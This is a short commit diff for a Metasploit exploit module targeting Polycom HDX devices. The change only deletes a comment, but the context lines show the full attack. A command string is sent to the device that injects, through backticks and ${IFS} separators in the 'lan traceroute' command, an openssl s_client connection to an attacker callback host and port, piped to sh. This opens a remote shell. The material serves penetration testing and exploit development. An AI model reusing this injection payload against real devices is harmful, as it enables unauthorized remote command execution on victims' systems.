Update polycom_hdx_traceroute_exec.rb
parent
829a7a53db
commit
676a08b849
|
@ -105,7 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# Figure out the port we picked
|
||||
cbport = self.service.getsockname[2]
|
||||
# Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
|
||||
cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
|
||||
sock.put(cmd)
|
||||
if datastore['VERBOSE']
|
||||
|
|
Loading…
Reference in New Issue